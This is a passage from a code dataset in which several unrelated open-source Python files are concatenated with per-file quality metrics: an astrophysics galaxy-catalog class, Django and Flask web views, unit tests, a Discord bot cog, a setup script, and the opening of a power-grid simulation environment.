| 0
| 0
| 0
| 1
| 0.023529
| false
| 0.005042
| 0.02521
| 0
| 0.189916
| 0.005042
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e4e27c4f397f2c0b09121050df5d040566af2dd
| 7,881
|
py
|
Python
|
v1/GCRCatalogs/MB2GalaxyCatalog.py
|
adam-broussard/descqa
|
d9681bd393553c31882ec7e28e6c1c7b6e482dd3
|
[
"BSD-3-Clause"
] | 4
|
2017-11-14T03:33:57.000Z
|
2021-06-05T16:35:40.000Z
|
v1/GCRCatalogs/MB2GalaxyCatalog.py
|
adam-broussard/descqa
|
d9681bd393553c31882ec7e28e6c1c7b6e482dd3
|
[
"BSD-3-Clause"
] | 136
|
2017-11-06T16:02:58.000Z
|
2021-11-11T18:20:23.000Z
|
v1/GCRCatalogs/MB2GalaxyCatalog.py
|
adam-broussard/descqa
|
d9681bd393553c31882ec7e28e6c1c7b6e482dd3
|
[
"BSD-3-Clause"
] | 31
|
2017-11-06T19:55:35.000Z
|
2020-12-15T13:53:53.000Z
|
# Massive Black 2 galaxy catalog class
import numpy as np
from astropy.table import Table
import astropy.units as u
import astropy.cosmology
from .GalaxyCatalogInterface import GalaxyCatalog
class MB2GalaxyCatalog(GalaxyCatalog):
"""
Massive Black 2 galaxy catalog class.
"""
def __init__(self, **kwargs):
fn = kwargs.get('fn')
self.type_ext = 'MB2'
self.filters = {
'zlo': True,
'zhi': True
}
self.h = 0.702
self.cosmology = astropy.cosmology.FlatLambdaCDM(H0=self.h*100.0, Om0 = 0.275)
self.quantities = {
'halo_id': self._get_stored_property,
'parent_halo_id': self._get_stored_property,
'redshift': self._get_stored_property,
'positionX': self._get_derived_property, # Position returned in Mpc, stored in kpc/h
'positionY': self._get_derived_property,
'positionZ': self._get_derived_property,
'velocityX': self._get_stored_property, # Velocity returned in km/sec
'velocityY': self._get_stored_property, # Velocity returned in km/sec
'velocityZ': self._get_stored_property, # Velocity returned in km/sec
'mass': self._get_derived_property, # Masses returned in Msun but stored in 1e10 Msun/h
'stellar_mass': self._get_derived_property,
'gas_mass': self._get_stored_property,
'sfr': self._get_stored_property,
'SDSS_u:observed:': self._get_derived_property,
'SDSS_g:observed:': self._get_derived_property,
'SDSS_r:observed:': self._get_derived_property,
'SDSS_i:observed:': self._get_derived_property,
'SDSS_z:observed:': self._get_derived_property,
'SDSS_u:rest:': self._get_derived_property,
'SDSS_g:rest:': self._get_derived_property,
'SDSS_r:rest:': self._get_derived_property,
'SDSS_i:rest:': self._get_derived_property,
'SDSS_z:rest:': self._get_derived_property,
}
self.derived = {
'mass': (('mass',), (1.e10 / self.h,), self._multiply),
'stellar_mass': (('stellar_mass',), (1.e10 / self.h,), self._multiply),
'positionX': (('x',), (1.e-3 / self.h,), self._multiply), # Position stored in kpc/h
'positionY': (('y',), (1.e-3 / self.h,), self._multiply),
'positionZ': (('z',), (1.e-3 / self.h,), self._multiply),
'SDSS_u:rest:': (('SDSS_u:rest:',), (), self._luminosity_to_magnitude),
'SDSS_g:rest:': (('SDSS_g:rest:',), (), self._luminosity_to_magnitude),
'SDSS_r:rest:': (('SDSS_r:rest:',), (), self._luminosity_to_magnitude),
'SDSS_i:rest:': (('SDSS_i:rest:',), (), self._luminosity_to_magnitude),
'SDSS_z:rest:': (('SDSS_z:rest:',), (), self._luminosity_to_magnitude),
'SDSS_u:observed:': (('SDSS_u:rest:', 'redshift'), (), self._add_distance_modulus),
'SDSS_g:observed:': (('SDSS_g:rest:', 'redshift'), (), self._add_distance_modulus),
'SDSS_r:observed:': (('SDSS_r:rest:', 'redshift'), (), self._add_distance_modulus),
'SDSS_i:observed:': (('SDSS_i:rest:', 'redshift'), (), self._add_distance_modulus),
'SDSS_z:observed:': (('SDSS_z:rest:', 'redshift'), (), self._add_distance_modulus),
}
self.Ngals = 0
self.sky_area = 4.*np.pi*u.sr # all sky by default
self.lightcone = False
self.box_size = 100.0 / self.h
self.SDSS_kcorrection_z = 0.1
return GalaxyCatalog.__init__(self, fn)
def load(self, fn):
"""
Given a catalog path, attempt to read the catalog and set up its
internal data structures.
"""
self.catalog = Table.read(fn, path='data')
self.Ngals = len(self.catalog)
self.redshift = self.catalog['redshift'][0]
return self
def _construct_mask(self, filters):
"""
Given a dictionary of filter constraints, construct a mask array
for use in filtering the catalog.
"""
if type(filters) is not dict:
raise TypeError("construct_mask: filters must be given as dict")
mask = np.ones(self.Ngals, dtype=bool)
mask &= (np.isfinite(self.catalog['x'])) # filter out NaN positions from catalog
mask &= (np.isfinite(self.catalog['y']))
mask &= (np.isfinite(self.catalog['z']))
for filter_name in filters.keys():
if filter_name == 'zlo':
mask &= (filters[filter_name] < self.catalog['redshift'])
elif filter_name == 'zhi':
mask &= (filters[filter_name] > self.catalog['redshift'])
return mask
def _get_stored_property(self, quantity, filters):
"""
Return the requested property of galaxies in the catalog as a NumPy
array. This is for properties that are explicitly stored in the
catalog.
"""
filter_mask = self._construct_mask(filters)
if not filter_mask.any():
return np.array([])
return self.catalog[quantity][np.where(filter_mask)].data
def _get_derived_property(self, quantity, filters):
"""
Return a derived halo property. These properties aren't stored
in the catalog but can be computed from properties that are via
a simple function call.
"""
filter_mask = self._construct_mask(filters)
if not filter_mask.any():
return np.array([])
arrays_required, scalars, func = self.derived[quantity]
return func([self.catalog[name][np.where(filter_mask)].data for name in arrays_required], scalars)
# Functions for computing derived values
def _translate(self, propList):
"""
Translation routine -- a passthrough that accomplishes mapping of
derived quantity names to stored quantity names via the derived
property function mechanism.
"""
return propList
def _multiply(self, array_tuple, scalar_tuple):
"""
Multiplication routine -- derived quantity is equal to a stored
quantity times some factor. Additional args for the derived quantity
routines are passed in as a tuple, so extract the factor first.
"""
return array_tuple[0] * scalar_tuple[0]
def _add_distance_modulus(self, array_tuple, scalar_tuple):
return self._luminosity_to_magnitude(array_tuple,scalar_tuple) + self.cosmology.distmod(array_tuple[1]).value
def _luminosity_to_magnitude(self,array_tuple,scalar_tuple):
bandlum = array_tuple[0]*1.0e28
bandflux = bandlum/(4*(np.pi)*(1.0e38)*(3.08567758**2))
return -2.5*(np.log10(bandflux)) - 48.6
| 52.192053
| 134
| 0.53242
| 836
| 7,881
| 4.776316
| 0.248804
| 0.040321
| 0.072126
| 0.082645
| 0.399449
| 0.304783
| 0.151265
| 0.065615
| 0.065615
| 0.032557
| 0
| 0.014241
| 0.358457
| 7,881
| 150
| 135
| 52.54
| 0.775514
| 0.153534
| 0
| 0.058824
| 0
| 0
| 0.109676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.04902
| 0.009804
| 0.254902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e4e87db0add45d330be3d156367bbd52e0ded32
| 714
|
py
|
Python
|
skylernet/views.py
|
skylermishkin/skylernet
|
d715c69348c050d976ba7931127a576565b67ff1
|
[
"MIT"
] | null | null | null |
skylernet/views.py
|
skylermishkin/skylernet
|
d715c69348c050d976ba7931127a576565b67ff1
|
[
"MIT"
] | null | null | null |
skylernet/views.py
|
skylermishkin/skylernet
|
d715c69348c050d976ba7931127a576565b67ff1
|
[
"MIT"
] | null | null | null |
from django.shortcuts import get_object_or_404, render
from django.contrib.staticfiles.templatetags.staticfiles import static
def index(request):
return render(request, 'skylernet/landing.html')
def connect(request):
context = {'online_media': [{"name": 'LinkedIn',
'href': 'https://www.linkedin.com/in/skyler-mishkin-62446b158',
'src': static('skylernet/LinkedIn.svg')},
{'name': 'GitHub',
'href': 'https://github.com/skylermishkin',
'src': static('skylernet/GitHub.png')}]}
return render(request, 'skylernet/connect.html', context)
| 42
| 96
| 0.564426
| 67
| 714
| 5.955224
| 0.58209
| 0.050125
| 0.095238
| 0.140351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022044
| 0.30112
| 714
| 16
| 97
| 44.625
| 0.777555
| 0
| 0
| 0
| 0
| 0
| 0.305322
| 0.092437
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.166667
| 0.083333
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e4f2abe49eca6572412ecb2672b250ab2b29afd
| 1,217
|
py
|
Python
|
specs/core.py
|
farleykr/acrylamid
|
c6c0f60b594d2920f6387ba82b552093d7c5fe1b
|
[
"BSD-2-Clause-FreeBSD"
] | 61
|
2015-01-15T23:23:11.000Z
|
2022-03-24T16:39:31.000Z
|
specs/core.py
|
farleykr/acrylamid
|
c6c0f60b594d2920f6387ba82b552093d7c5fe1b
|
[
"BSD-2-Clause-FreeBSD"
] | 28
|
2015-01-26T22:32:24.000Z
|
2022-01-13T01:11:56.000Z
|
specs/core.py
|
farleykr/acrylamid
|
c6c0f60b594d2920f6387ba82b552093d7c5fe1b
|
[
"BSD-2-Clause-FreeBSD"
] | 25
|
2015-01-22T19:26:29.000Z
|
2021-06-30T21:53:06.000Z
|
# -*- coding: utf-8 -*-
import attest
from acrylamid.core import cache
class Cache(attest.TestBase):
def __context__(self):
with attest.tempdir() as path:
self.path = path
cache.init(self.path)
yield
@attest.test
def persistence(self):
cache.init(self.path)
cache.set('foo', 'bar', "Hello World!")
cache.set('foo', 'baz', "spam")
assert cache.get('foo', 'bar') == "Hello World!"
assert cache.get('foo', 'baz') == "spam"
cache.shutdown()
cache.init(self.path)
assert cache.get('foo', 'bar') == "Hello World!"
assert cache.get('foo', 'baz') == "spam"
@attest.test
def remove(self):
cache.init(self.path)
cache.set('foo', 'bar', 'baz')
cache.remove('foo')
cache.remove('invalid')
assert cache.get('foo', 'bar') == None
assert cache.get('invalid', 'bla') == None
@attest.test
def clear(self):
cache.init(self.path)
cache.set('foo', 'bar', 'baz')
cache.set('spam', 'bar', 'baz')
cache.clear()
assert cache.get('foo', 'bar') == None
assert cache.get('spam', 'bar') == None
| 23.862745
| 56
| 0.532457
| 147
| 1,217
| 4.380952
| 0.251701
| 0.136646
| 0.173913
| 0.158385
| 0.473602
| 0.473602
| 0.473602
| 0.473602
| 0.473602
| 0.301242
| 0
| 0.001152
| 0.286771
| 1,217
| 50
| 57
| 24.34
| 0.740783
| 0.017256
| 0
| 0.457143
| 0
| 0
| 0.126466
| 0
| 0
| 0
| 0
| 0
| 0.228571
| 1
| 0.114286
| false
| 0
| 0.057143
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e554dd387e1b98981fc98073b0b6ac0775be949
| 812
|
py
|
Python
|
swcf/controllers/index.py
|
pratiwilestari/simpleWebContactForm
|
56369daadb8130bb72c19ae8ee10ad590804c84d
|
[
"MIT"
] | null | null | null |
swcf/controllers/index.py
|
pratiwilestari/simpleWebContactForm
|
56369daadb8130bb72c19ae8ee10ad590804c84d
|
[
"MIT"
] | null | null | null |
swcf/controllers/index.py
|
pratiwilestari/simpleWebContactForm
|
56369daadb8130bb72c19ae8ee10ad590804c84d
|
[
"MIT"
] | null | null | null |
from flask.helpers import flash
from flask.wrappers import Request
from swcf import app
from flask import render_template, redirect, request, url_for
from swcf.dao.indexDAO import *
@app.route("/", methods=['GET'])
def index():
return render_template("layout.html")
@app.route("/sendPost", methods=['POST'])
def sendPost():
print('masuk sini')
name = request.form['name']
email = request.form['email']
issue = request.form['issue']
content = request.form['fillContent']
print(name, email, issue, content)
hInsert = insertPost(name, email, issue, 'content')
print(hInsert)
if hInsert['flag'] == 'T':
flash("Proses insert berhasil", 'success')
else :
flash("Tidak dapat melakukan proses insert", 'error')
return render_template("layout.html")
| 31.230769
| 61
| 0.674877
| 100
| 812
| 5.44
| 0.49
| 0.080882
| 0.073529
| 0.095588
| 0.110294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181034
| 812
| 26
| 62
| 31.230769
| 0.818045
| 0
| 0
| 0.086957
| 0
| 0
| 0.190652
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.217391
| 0.043478
| 0.391304
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e5734bc9428d420f659a156adfa25e7ae27b0df
| 4,668
|
py
|
Python
|
tests/broker/test_show_machine.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 7
|
2015-07-31T05:57:30.000Z
|
2021-09-07T15:18:56.000Z
|
tests/broker/test_show_machine.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 115
|
2015-03-03T13:11:46.000Z
|
2021-09-20T12:42:24.000Z
|
tests/broker/test_show_machine.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 13
|
2015-03-03T11:17:59.000Z
|
2021-09-09T09:16:41.000Z
|
#!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the show machine command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
class TestShowMachine(TestBrokerCommand):
def testverifymachineall(self):
command = ["show", "machine", "--all"]
out = self.commandtest(command)
self.matchoutput(out, "ut3c5n10", command)
self.matchoutput(out, "ut3c1n3", command)
self.matchoutput(out, "ut3c1n4", command)
self.matchoutput(out, "ut3s01p1", command)
self.matchoutput(out, "ut8s02p1", command)
self.matchoutput(out, "ut9s03p1", command)
self.matchoutput(out, "ut10s04p1", command)
self.matchoutput(out, "ut11s01p1", command)
self.matchoutput(out, "f5test", command)
def testverifymachineallproto(self):
command = ["show", "machine", "--all", "--format", "proto"]
machines = self.protobuftest(command)
machine_names = set(msg.name for msg in machines)
for machine in ("ut3c5n10", "ut3c1n3", "ut3c1n4", "ut3s01p1",
"ut8s02p1", "ut9s03p1", "ut10s04p1", "ut11s01p1",
"f5test"):
self.assertIn(machine, machine_names)
def testverifyut3c1n3interfacescsv(self):
command = "show machine --machine ut3c1n3 --format csv"
out = self.commandtest(command.split(" "))
net = self.net["unknown0"]
self.matchoutput(out,
"ut3c1n3,ut3,ut,ibm,hs21-8853,KPDZ406,eth0,%s,%s" %
(net.usable[2].mac, net.usable[2]), command)
self.matchoutput(out,
"ut3c1n3,ut3,ut,ibm,hs21-8853,KPDZ406,eth1,%s,%s" %
(net.usable[3].mac, net.usable[3]), command)
self.matchoutput(out,
"ut3c1n3,ut3,ut,ibm,hs21-8853,KPDZ406,bmc,%s,%s" %
(net.usable[4].mac, net.usable[4]), command)
def testrejectfqdn(self):
command = "show machine --machine unittest00.one-nyp.ms.com"
out = self.badrequesttest(command.split(" "))
self.matchoutput(out, "Illegal hardware label", command)
def testshowproto(self):
command = ["show_machine", "--machine", "ut3c1n3", "--format", "proto"]
machine = self.protobuftest(command, expect=1)[0]
self.assertEqual(machine.name, "ut3c1n3")
self.assertEqual(machine.host, "unittest00.one-nyp.ms.com")
self.assertEqual(machine.location.name, "ut3")
self.assertEqual(machine.model.name, "hs21-8853")
self.assertEqual(machine.model.vendor, "ibm")
self.assertEqual(machine.model.model_type, "blade")
self.assertEqual(machine.cpu, "e5-2660")
self.assertEqual(machine.cpu_count, 2)
self.assertEqual(machine.memory, 8192)
self.assertEqual(machine.serial_no, "KPDZ406")
self.assertEqual(len(machine.interfaces), 3)
self.assertEqual(len(machine.disks), 2)
self.assertEqual(machine.disks[0].device_name, "c0d0")
self.assertEqual(machine.disks[0].disk_type, "cciss")
self.assertEqual(machine.disks[0].capacity, 34)
self.assertEqual(machine.disks[0].address, "")
self.assertEqual(machine.disks[0].bus_address, "pci:0000:01:00.0")
self.assertEqual(machine.disks[0].wwn,
"600508b112233445566778899aabbccd")
self.assertEqual(machine.disks[1].device_name, "sda")
self.assertEqual(machine.disks[1].disk_type, "scsi")
self.assertEqual(machine.disks[1].capacity, 68)
self.assertEqual(machine.disks[1].address, "")
self.assertEqual(machine.disks[1].bus_address, "")
self.assertEqual(machine.disks[1].wwn, "")
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestShowMachine)
unittest.TextTestRunner(verbosity=2).run(suite)
| 45.320388
| 79
| 0.646744
| 538
| 4,668
| 5.557621
| 0.371747
| 0.120401
| 0.161873
| 0.108361
| 0.251505
| 0.104348
| 0.080936
| 0.052843
| 0.052843
| 0.052843
| 0
| 0.06807
| 0.216367
| 4,668
| 102
| 80
| 45.764706
| 0.749317
| 0.161954
| 0
| 0.040541
| 0
| 0
| 0.163239
| 0.057069
| 0
| 0
| 0
| 0
| 0.337838
| 1
| 0.067568
| false
| 0
| 0.054054
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e5cfbb9bf026d80e086f27d5037c72987aa2b73
| 447
|
py
|
Python
|
secret/forms.py
|
MinisterioPublicoRJ/apilabcontas
|
c01d5c0f1e6705eb8470ba7ba5078c0c172a9570
|
[
"MIT"
] | 2
|
2019-06-10T18:34:15.000Z
|
2020-04-29T14:23:34.000Z
|
secret/forms.py
|
MinisterioPublicoRJ/datalakecadg
|
c01d5c0f1e6705eb8470ba7ba5078c0c172a9570
|
[
"MIT"
] | 5
|
2020-01-09T15:59:16.000Z
|
2021-06-10T21:06:13.000Z
|
secret/forms.py
|
MinisterioPublicoRJ/datalakecadg
|
c01d5c0f1e6705eb8470ba7ba5078c0c172a9570
|
[
"MIT"
] | null | null | null |
from django import forms
from django.core.exceptions import ValidationError
from secret.models import Secret
class SecretForm(forms.ModelForm):
class Meta:
model = Secret
fields = ['username', 'email']
def clean_username(self):
username = self.cleaned_data['username']
if Secret.objects.filter(username=username).exists():
raise ValidationError("Usuário já existe!")
return username
| 26.294118
| 61
| 0.686801
| 49
| 447
| 6.22449
| 0.632653
| 0.065574
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.223714
| 447
| 16
| 62
| 27.9375
| 0.878963
| 0
| 0
| 0
| 0
| 0
| 0.087248
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.25
| 0
| 0.583333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e5e1d23daee791eaea271ade55225f743349e3f
| 1,067
|
py
|
Python
|
tests/utils.py
|
1116574/vulcan-api
|
3cf64e78ba3e68299c94d629c3ffe4f7e8c94aed
|
[
"MIT"
] | null | null | null |
tests/utils.py
|
1116574/vulcan-api
|
3cf64e78ba3e68299c94d629c3ffe4f7e8c94aed
|
[
"MIT"
] | null | null | null |
tests/utils.py
|
1116574/vulcan-api
|
3cf64e78ba3e68299c94d629c3ffe4f7e8c94aed
|
[
"MIT"
] | null | null | null |
from datetime import date
from os import environ
PARAMS_LESSON_PLAN = [
(
date(2018, 9, 4),
[
{"IdPrzedmiot": 173, "IdPracownik": 99},
{"IdPrzedmiot": 123, "IdPracownik": 101},
{"IdPrzedmiot": 172, "IdPracownik": 92},
{"IdPrzedmiot": 189, "IdPracownik": 91},
{"IdPrzedmiot": 119, "IdPracownik": 100},
{"IdPrzedmiot": 175, "IdPracownik": 97},
{"IdPrzedmiot": 118, "IdPracownik": 89},
],
)
]
PARAMS_TESTS = [
(date(2018, 10, 5), [{"Id": 661, "IdPrzedmiot": 177, "IdPracownik": 87}]),
(
date(2018, 10, 23),
[
{"Id": 798, "IdPrzedmiot": 173, "IdPracownik": 99},
{"Id": 838, "IdPrzedmiot": 172, "IdPracownik": 92},
],
),
]
PARAMS_HOMEWORKS = [
(
date(2018, 10, 23),
[
{"Id": 305, "IdPracownik": 100, "IdPrzedmiot": 119},
{"Id": 306, "IdPracownik": 100, "IdPrzedmiot": 119},
],
)
]
def load_variable(name):
return environ.get(name)
| 24.813953
| 78
| 0.492034
| 97
| 1,067
| 5.360825
| 0.484536
| 0.061538
| 0.144231
| 0.103846
| 0.053846
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 0.325211
| 1,067
| 42
| 79
| 25.404762
| 0.572222
| 0
| 0
| 0.135135
| 0
| 0
| 0.256795
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.054054
| 0.027027
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e5eaad811b723cd9fbdf58606b08cc92c36666b
| 886
|
py
|
Python
|
setup.py
|
utahta/pyvbcode
|
5708f5563016578576a48cf7374470c4e5c11825
|
[
"MIT"
] | 3
|
2018-10-14T12:38:49.000Z
|
2021-06-05T08:13:42.000Z
|
setup.py
|
utahta/pyvbcode
|
5708f5563016578576a48cf7374470c4e5c11825
|
[
"MIT"
] | 1
|
2017-07-02T15:27:45.000Z
|
2017-10-28T20:52:54.000Z
|
setup.py
|
utahta/pyvbcode
|
5708f5563016578576a48cf7374470c4e5c11825
|
[
"MIT"
] | 5
|
2016-12-26T08:06:24.000Z
|
2020-02-22T17:20:16.000Z
|
# vim:fileencoding=utf8
from distutils.core import setup
import os
README = os.path.join(os.path.dirname(__file__),'PKG-INFO')
long_description = open(README).read() + "\n"
setup(name="vbcode",
version='0.2.0',
py_modules=['vbcode'],
description="Variable byte codes",
author="utahta",
author_email = "labs.ninxit@gmail.com",
long_description=long_description,
classifiers=["Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Python Software Foundation License",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Python Modules",
"Natural Language :: Japanese"
],
url="https://github.com/utahta/pyvbcode",
license="MIT"
)
| 36.916667
| 83
| 0.595937
| 88
| 886
| 5.897727
| 0.727273
| 0.086705
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007764
| 0.273138
| 886
| 23
| 84
| 38.521739
| 0.798137
| 0.023702
| 0
| 0
| 0
| 0
| 0.420626
| 0.024334
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.095238
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e5f5a16f32d2c7ad12cdebabca7ff18c984b6b6
| 1,221
|
py
|
Python
|
cogs/testing_cog.py
|
Critteros/DzwoneczekBOT
|
4f6100cf26f430521247f494620c9a2ceda1f362
|
[
"Apache-2.0"
] | null | null | null |
cogs/testing_cog.py
|
Critteros/DzwoneczekBOT
|
4f6100cf26f430521247f494620c9a2ceda1f362
|
[
"Apache-2.0"
] | null | null | null |
cogs/testing_cog.py
|
Critteros/DzwoneczekBOT
|
4f6100cf26f430521247f494620c9a2ceda1f362
|
[
"Apache-2.0"
] | null | null | null |
"""
Extension desined to test bot functionality, just for testing
"""
# Library includes
from discord.ext import commands
# App includes
from app.client import BotClient
class TestCog(commands.Cog):
"""
Class cog for the testing_cog cog extension
"""
def __init__(self, client: BotClient):
self.client: BotClient = client
self.log = client.log
@commands.command(help='test', brief='Testing command')
async def echo(self, ctx: commands.Context, *args):
"""
Testing fuction designed to print context to logging output
Args:
ctx (commands.Context): Context of invocation
"""
log = self.log
log.debug('Executing echo command')
log.debug(f'Context is: {ctx.__dict__}')
log.debug(f'Context type is {type(ctx)}')
log.debug(f'Context message: {ctx.args}')
log.debug(f'data is: /{args}/\n data type is{type(args)}')
await ctx.message.reply("Hi <:python:815369954224373760>")
def setup(client):
"""
Setup function for testing_cog extension
Args:
client (app.client.BotClient): Client that connects to discord API
"""
client.add_cog(TestCog(client))
| 24.42
| 74
| 0.63964
| 153
| 1,221
| 5.03268
| 0.405229
| 0.051948
| 0.046753
| 0.062338
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019523
| 0.244881
| 1,221
| 49
| 75
| 24.918367
| 0.815618
| 0.208845
| 0
| 0
| 0
| 0
| 0.256881
| 0.036697
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e5ff0af4ee8d2c0f56518f7dfc6f17b87b1d4b4
| 44,126
|
py
|
Python
|
setup.py
|
amahoro12/anne
|
9b68c71c491bde4f57c2cbbf78a377239a9026d8
|
[
"MIT"
] | null | null | null |
setup.py
|
amahoro12/anne
|
9b68c71c491bde4f57c2cbbf78a377239a9026d8
|
[
"MIT"
] | null | null | null |
setup.py
|
amahoro12/anne
|
9b68c71c491bde4f57c2cbbf78a377239a9026d8
|
[
"MIT"
] | null | null | null |
## This script set up classes for 4 bus and 2 bus environment
import pandapower as pp
import pandapower.networks as nw
import pandapower.plotting as plot
import enlopy as el
import numpy as np
import pandas as pd
import pickle
import copy
import math
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
import pandapower.control as ct
import statistics as stat
from FACTScontrol import SeriesFACTS, ShuntFACTS
pd.options.display.float_format = '{:.4g}'.format
### This 4-bus class is not complete as of handover to ABB PG and Magnus Tarle.
# The 2-bus class further below is however complete.
class powerGrid_ieee4:
def __init__(self, numberOfTimeStepsPerState=4):
print('in init. Here we lay down the grid structure and load some random state values based on IEEE dataset');
with open('Data/JanLoadEvery5mins.pkl', 'rb') as pickle_file:
self.loadProfile = pickle.load(pickle_file)
with open('Data/generatorValuesEvery5mins.pkl', 'rb') as pickle_file:
self.powerProfile = pickle.load(pickle_file)
with open('Data/trainIndices.pkl', 'rb') as pickle_file:
self.trainIndices = pickle.load(pickle_file)
with open('Data/testIndices.pkl', 'rb') as pickle_file:
self.testIndices = pickle.load(pickle_file)
self.k_old=0;
self.q_old=0;
self.actionSpace = {'v_ref_pu': [i*5 / 100 for i in range(16, 25)], 'lp_ref': [i * 5 for i in range(0, 31)]}
## Basic ieee 4bus system
self.net = pp.networks.case4gs();
####Shunt FACTS device (bus 1)
# MV bus
bus_SVC = pp.create_bus(self.net, name='MV SVCtrafo bus', vn_kv=69, type='n', geodata=(-2, 2.5), zone=2,
max_vm_pu=1.1,
min_vm_pu=0.9)
# Trafo
trafoSVC = pp.create_transformer_from_parameters(self.net, hv_bus=1, lv_bus=4, in_service=True,
name='trafoSVC', sn_mva=110, vn_hv_kv=230, vn_lv_kv=69,
vk_percent=12, vkr_percent=0.26, pfe_kw=55, i0_percent=0.06,
shift_degree=0, tap_side='hv', tap_neutral=0, tap_min=-9,
tap_max=9,
tap_step_percent=1.5, tap_step_degree=0,
tap_phase_shifter=False)
# Tap changer usually not used on this trafo in real life implementation
#trafo_control = ct.DiscreteTapControl(net=self.net, tid=0, vm_lower_pu=0.95, vm_upper_pu=1.05)
# Breaker between grid HV bus and trafo HV bus to connect buses
